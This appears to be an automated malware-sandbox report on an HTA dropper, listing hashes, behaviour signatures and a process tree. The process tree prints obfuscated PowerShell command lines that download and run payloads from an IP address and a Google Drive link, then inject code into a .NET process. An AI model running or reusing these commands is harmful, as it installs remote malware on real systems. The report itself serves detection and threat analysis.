Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08/11/2024, 03:53
Static task
static1
Behavioral task
behavioral1
Sample
d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta
Resource
win10v2004-20241007-en
General
-
Target
d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta
-
Size
207KB
-
MD5
21bf484c8fe4564e1f0e0fc0aa522199
-
SHA1
0bda2d5048d1555ef9ef50f4fd192c0838677c94
-
SHA256
d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6
-
SHA512
1dbf4a2f78b482b6d80eb48c9c2434a8907081a468c820ad9085fcede6134fe41c8c27a3e8f2ad7fa3f1d702e2b0904d885bfda8300ced9c4924c6e869e9baea
-
SSDEEP
96:43F97gSlqxRtwJPcEI/MOoMQbvfhKGAfQ:43F1OxvmUxevfU3Q
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 34 IoCs
flow pid Process 17 3824 poWERSHElL.EXe 22 2744 powershell.exe 25 2744 powershell.exe 29 2744 powershell.exe 43 4744 mshta.exe 46 4744 mshta.exe 48 4744 mshta.exe 52 4744 mshta.exe 53 4744 mshta.exe 54 4744 mshta.exe 56 4744 mshta.exe 57 4744 mshta.exe 58 4744 mshta.exe 59 4744 mshta.exe 60 4744 mshta.exe 67 4744 mshta.exe 70 4744 mshta.exe 71 4744 mshta.exe 72 4744 mshta.exe 73 4744 mshta.exe 75 4744 mshta.exe 77 4744 mshta.exe 78 4744 mshta.exe 79 4744 mshta.exe 80 4744 mshta.exe 82 4744 mshta.exe 84 4744 mshta.exe 85 4744 mshta.exe 86 4744 mshta.exe 87 4744 mshta.exe 89 4744 mshta.exe 91 4744 mshta.exe 92 4744 mshta.exe 93 4744 mshta.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2892 powershell.exe 2744 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 3824 poWERSHElL.EXe 2476 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 drive.google.com 22 drive.google.com -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2744 set thread context of 720 2744 powershell.exe 109 PID 720 set thread context of 4744 720 aspnet_compiler.exe 84 PID 720 set thread context of 724 720 aspnet_compiler.exe 110 PID 724 set thread context of 4744 724 ieUnatt.exe 84 PID 724 set thread context of 440 724 ieUnatt.exe 115 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWERSHElL.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ieUnatt.exe -
description ioc Process Key created \Registry\User\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 ieUnatt.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings poWERSHElL.EXe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 3824 poWERSHElL.EXe 3824 poWERSHElL.EXe 2476 powershell.exe 2476 powershell.exe 2892 powershell.exe 2892 powershell.exe 2744 powershell.exe 2744 powershell.exe 2744 powershell.exe 2744 powershell.exe 2744 powershell.exe 2744 powershell.exe 720 aspnet_compiler.exe 720 aspnet_compiler.exe 720 aspnet_compiler.exe 720 aspnet_compiler.exe 720 aspnet_compiler.exe 720 aspnet_compiler.exe 720 aspnet_compiler.exe 720 aspnet_compiler.exe 724 ieUnatt.exe 724 ieUnatt.exe 724 ieUnatt.exe 724 ieUnatt.exe 724 ieUnatt.exe 724 ieUnatt.exe 724 ieUnatt.exe 724 ieUnatt.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 720 aspnet_compiler.exe 4744 mshta.exe 4744 mshta.exe 724 ieUnatt.exe 724 ieUnatt.exe 724 ieUnatt.exe 724 ieUnatt.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3824 poWERSHElL.EXe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 2744 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 4744 wrote to memory of 3824 4744 mshta.exe 87 PID 4744 wrote to memory of 3824 4744 mshta.exe 87 PID 4744 wrote to memory of 3824 4744 mshta.exe 87 PID 3824 wrote to memory of 2476 3824 poWERSHElL.EXe 90 PID 3824 wrote to memory of 2476 3824 poWERSHElL.EXe 90 PID 3824 wrote to memory of 2476 3824 poWERSHElL.EXe 90 PID 3824 wrote to memory of 2836 3824 poWERSHElL.EXe 93 PID 3824 wrote to memory of 2836 3824 poWERSHElL.EXe 93 PID 3824 wrote to memory of 2836 3824 poWERSHElL.EXe 93 PID 2836 wrote to memory of 4816 2836 csc.exe 96 PID 2836 wrote to memory of 4816 2836 csc.exe 96 PID 2836 wrote to memory of 4816 2836 csc.exe 96 PID 3824 wrote to memory of 1252 3824 poWERSHElL.EXe 99 PID 3824 wrote to memory of 1252 3824 poWERSHElL.EXe 99 PID 3824 wrote to memory of 1252 3824 poWERSHElL.EXe 99 PID 1252 wrote to memory of 2892 1252 WScript.exe 100 PID 1252 wrote to memory of 2892 1252 WScript.exe 100 PID 1252 wrote to memory of 2892 1252 WScript.exe 100 PID 2892 wrote to memory of 2744 2892 powershell.exe 102 PID 2892 wrote to memory of 2744 2892 powershell.exe 102 PID 2892 wrote to memory of 2744 2892 powershell.exe 102 PID 2744 wrote to memory of 3648 2744 powershell.exe 107 PID 2744 wrote to memory of 3648 2744 powershell.exe 107 PID 2744 wrote to memory of 3648 2744 powershell.exe 107 PID 2744 wrote to memory of 4204 2744 powershell.exe 108 PID 2744 wrote to memory of 4204 2744 powershell.exe 108 PID 2744 wrote to memory of 4204 2744 powershell.exe 108 PID 2744 wrote to memory of 720 2744 powershell.exe 109 PID 2744 wrote to memory of 720 2744 powershell.exe 109 PID 2744 wrote to memory of 720 2744 powershell.exe 109 PID 2744 wrote to memory of 720 2744 powershell.exe 109 PID 2744 wrote to memory of 720 2744 powershell.exe 109 PID 2744 wrote to memory of 720 2744 powershell.exe 109 PID 4744 wrote to memory of 724 4744 mshta.exe 110 PID 4744 wrote to memory of 724 4744 mshta.exe 110 PID 4744 wrote to memory of 724 4744 mshta.exe 110 PID 724 wrote to memory of 440 724 ieUnatt.exe 115 PID 724 wrote to memory of 440 724 ieUnatt.exe 115
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\d1a5e6708ae70fff83f394f2fc5027d14e42fdb624c369662ebcd682cded0ac6.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe"C:\Windows\SySTEM32\winDOwSPOWERsHeLl\v1.0\poWERSHElL.EXe" "poWErSheLl.EXe -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT ; iEx($(IEX('[SYStEm.tExT.eNCoDiNG]'+[CHAR]58+[chAR]58+'UTf8.GEtSTRinG([SYSTem.convERT]'+[char]58+[char]0x3a+'FRoMbaSe64string('+[chAr]34+'JEY2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSmtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVudktEYVVrdUgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWG9XdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRpaVh2ZEYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNWWNsQ2xJSEdibiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbk51UElVamZUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRGNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC4yMy83OS9zZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZXJsb3Zlci50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhncmVhdG1hZ2ljYWx0aGluZ3N3aXRoaGUudmJzIiwwLDApO3NUYXJULXNMRWVQKDMpO1NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdyZWF0bWFnaWNhbHRoaW5nc3dpdGhoZS52YnMi'+[ChAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAsS -noP -W 1 -c DEviCECReDEntiaLdeployMeNT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ahwka2o\2ahwka2o.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8A1.tmp" "c:\Users\Admin\AppData\Local\Temp\2ahwka2o\CSC1B985D9A5D944C5C81AA4C633C44B3F.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:4816
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCcxamdpbScrJ2FnZVVybCA9IDViSmh0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmMnKydvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQnKyc9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIDViSjsxamd3ZWJDbGllbnQgPSBOZScrJ3ctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OzFqJysnZ2ltYWdlQnl0ZXMgPSAxamd3ZWJDbGllbnQuRG93bmxvYWREYXRhKDFqZ2ltYWdlVXJsKTsxamdpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOicrJzpVVEY4LkdldFN0cmluZygxamdpbWFnZUJ5JysndGVzKTsxamdzdGFydEZsYWcgPSAnKyc1Yko8PEJBU0U2NF9TVEFSVD4+NWJKOzFqZ2VuZEZsYWcgPSA1Yko8PCcrJ0JBU0U2NF9FTkQ+PjViSjsxamdzdGFydEluZGV4ID0nKycgMWpnaW1hZ2VUZXh0LicrJ0knKyduZGV4T2YoMWpnc3RhcnRGbGFnKTsxamdlbmRJbmRleCA9IDFqZ2knKydtYWdlVGV4dC5JbmRleE8nKydmKDFqZ2VuZEZsYWcpOzFqZ3N0YXJ0SW5kZXggLWdlICcrJzAgLWFuZCAxamdlbmRJbmRleCAtZ3QgMWpnc3RhcnRJbmRleDsxamdzdGFydEluZGV4ICs9IDFqZ3N0YXJ0RmxhZy5MZW5ndGg7MWpnYmFzZTY0JysnTGVuZ3RoID0gMWpnZW5kSW5kZXggLSAxamdzdGFydEluZGV4OzFqZ2JhJysnc2U2NENvbW1hbmQgPSAxamdpbWFnZVRleHQuU3Vic3RyaW5nJysnKDFqZ3N0YXJ0SW5kZXgsIDFqZ2Jhc2U2NExlbmd0aCk7MWpnYmFzZTY0UmV2ZScrJ3JzZWQgPSAtam9pbiAoMWpnYmFzZTY0Q29tbWEnKyduZC5Ub0NoYXJBcnJheSgpIDE1biBGb3JFYWNoLU9iamVjdCB7IDFqZ18gfSlbLTEuLi0oMWpnYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTsxamdjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTYnKyc0U3RyaW5nKDFqZ2Jhc2U2NFJldmVyc2VkKTsxamdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06JysnOkxvYWQoMWpnY29tbWFuZEJ5dGVzKTsxamd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDViSlZBSTViSik7MWpndmFpTWV0aG8nKydkLkludm9rZSgxamdudWxsLCBAKDViSnR4dC5GQ0RSVy85Ny8zMi40LjM3MS43MDEvLzpwdHRoNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YkpkZXNhdGl2YWRvNWJKLCA1YicrJ0pkZXNhdGl2YWRvNWJKLCA1Ykphc3BuZXRfY29tcGlsZXI1YkosIDViSmRlc2F0aXZhZG81YkosIDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSmRlc2F0aXZhZG81YkosNWJKZGVzYXRpdmFkbzViSiw1YkpkZXNhdGl2YWRvNWJKLDViSjE1YkosNWJKZGVzYXRpdmFkbzViSikpOycpLlJlcGxhY0UoJzViSicsW1NUcklOZ11bQ2hhUl0zOSkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdNTMrW0NoYVJdMTEwKSxbU1RySU5nXVtDaGFSXTEyNCkuUmVwbGFjRSgoW0NoYVJdNDkrW0NoYVJdMTA2K1tDaGFSXTEwMyksJyQnKXwgJiAoKGd2ICcqbWRyKicpLm5hTWVbMywxMSwyXS1KT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('1jgim'+'ageUrl = 5bJhttps:/'+'/drive.google.c'+'om/uc?export=download&id'+'=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 5bJ;1jgwebClient = Ne'+'w-Object System.Net.WebClient;1j'+'gimageBytes = 1jgwebClient.DownloadData(1jgimageUrl);1jgimageText = [System.Text.Encoding]:'+':UTF8.GetString(1jgimageBy'+'tes);1jgstartFlag = '+'5bJ<<BASE64_START>>5bJ;1jgendFlag = 5bJ<<'+'BASE64_END>>5bJ;1jgstartIndex ='+' 1jgimageText.'+'I'+'ndexOf(1jgstartFlag);1jgendIndex = 1jgi'+'mageText.IndexO'+'f(1jgendFlag);1jgstartIndex -ge '+'0 -and 1jgendIndex -gt 1jgstartIndex;1jgstartIndex += 1jgstartFlag.Length;1jgbase64'+'Length = 1jgendIndex - 1jgstartIndex;1jgba'+'se64Command = 1jgimageText.Substring'+'(1jgstartIndex, 1jgbase64Length);1jgbase64Reve'+'rsed = -join (1jgbase64Comma'+'nd.ToCharArray() 15n ForEach-Object { 1jg_ })[-1..-(1jgbase64Command.Length)];1jgcommandBytes = [System.Convert]::FromBase6'+'4String(1jgbase64Reversed);1jgloadedAssembly = [System.Reflection.Assembly]:'+':Load(1jgcommandBytes);1jgvaiMethod = [dnlib.IO.Home].GetMethod(5bJVAI5bJ);1jgvaiMetho'+'d.Invoke(1jgnull, @(5bJtxt.FCDRW/97/32.4.371.701//:ptth5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ, 5b'+'Jdesativado5bJ, 5bJaspnet_compiler5bJ, 5bJdesativado5bJ, 5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJdesativado5bJ,5bJ15bJ,5bJdesativado5bJ));').ReplacE('5bJ',[STrINg][ChaR]39).ReplacE(([ChaR]49+[ChaR]53+[ChaR]110),[STrINg][ChaR]124).ReplacE(([ChaR]49+[ChaR]106+[ChaR]103),'$')| & ((gv '*mdr*').naMe[3,11,2]-JOIN'')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵PID:3648
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵PID:4204
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:720
-
-
-
-
-
-
C:\Windows\SysWOW64\ieUnatt.exe"C:\Windows\SysWOW64\ieUnatt.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:440
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
12KB
MD5ce1bcfc9190c6cfda08148fb743882a2
SHA123a4d112625e8691f4347f3b281fe3b14ad15e92
SHA256b66a07448dc9682b36c3f6ee59fd713a98fb78af01d20ba6faf6b19412ce1556
SHA512862da3622fb6ff94e70da2b7efd139eeab8041fb911777f5140a8a9d3d3020d64a5d48dbfbb27ad9e20baa66c8fb2b309ea7c7f36ecb07be5c3c2a943668c0ab
-
Filesize
18KB
MD57eb358f916ead42489c03b8d0e109df4
SHA11cb6bbf55dec6ff98dd9064704d5329384472caf
SHA256207ed2190f1c5d0bad439c5c09ea1129c14f71edbdc922468dee9b960bce8d9f
SHA5125641ea86ebd53afb29e28d5b63f825636dc1855f4ed1d52f8a302ab7b8c5abe3f2f661ba80cdc2a9cba250a0088d3e0c7620ae88e5d9ae64fd7dae1cfb84b178
-
Filesize
3KB
MD5e32db995d7c04aa9abc2adb3cb78e3b6
SHA1c761f8e511f66e5cc2cf4fba9096ae8be53d0dac
SHA2562b97843d7061a685d3a58b55ece4a03031f64f3b818622776f2050251adb8bda
SHA512ffcf13696ba920be2eac92bacc60fb9975200d1c8343946a6907588fa966bca84dcb375c236fa7682740550e528f29a5ebd3377e6c7ab67988e9e01c8aadfb93
-
Filesize
1KB
MD55ac3e7b2c8b665309085844070338689
SHA1d227ed68e70ffd96cdb3205ee8c8cf9501e9511a
SHA256dff206519b65ae94d2078dcf7db3378911060aa2598f309ccaef16b316768b44
SHA51281b017d2f40d60d2022d0409bcd62a04ac35f607b6499e8880fc3b4d83e7d0aa215b27bff8503a61d09cf939b5d83a714d897d0c33ccf307b81f9f101820201c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
138KB
MD53a172f4d749a3cf2a42e0b7df638c8d3
SHA1071d3b7db5a649ec3252af5b5a21ed047e71c785
SHA256fe03066a9d3659d5f1e5941c7a73646780d55d15a57a9dde5901f469db2ead72
SHA51230cc1c96d8cae17800f33f63d7ef8965536051ee7ec683b45e5c62079bf9487785ccc9b8ae8ab073f25f9059f1bbf84f73f8c8ff68c807c0e7007d597dced0d7
-
Filesize
480B
MD502801ca1be5cf5616a9f398c85c263db
SHA1e9000f0b5cd0dceb296fb59f9ed2c85717666377
SHA2566d63144887d63ca3c8794b18c2e2283a7f5e6fdc5355fb24c0c3e7d11a172586
SHA5124a27658c15203dd2122759a70db7f2917eb7a8899f9590f80a01b95d55a0631d0fce21d1ca6c9ec4111aabb7d9bdb9396f6483e42bb10850e9a9305d21616902
-
Filesize
369B
MD59f189319c7026f4c8c2bc274b31dcbc1
SHA13d7cf616092e9342ffe58dbf0141a5e897c0c821
SHA2564c87877673281431e8360baad648f64cdd3492b8959830f13c4350c0ce5ea398
SHA512f017ba488a6104f6eeed822944c73a5d3e69b214efe71a53876e1fd1fa4fb331d3d0cc64af14daa7b871ab357bce5047efd8a01942e153a66c7765360a3e6fba
-
Filesize
652B
MD5f26b3a26ab9c4a46fde242aaaca9a332
SHA12dbb75a8f5c366597503e49e17225fea551e4aef
SHA2566c13e7351b8e2dab0b4ca221f593ca473762d9b78d1bfb3a0d3f6c8e1f662270
SHA5129531d901c1958a367bcf0f0426f30035f7ef681dcb94a12bd3bce25cbc92af4f35a3625382e3f57eb7baa5158fbde5b64e35beaad82199eae18aee4daa07e135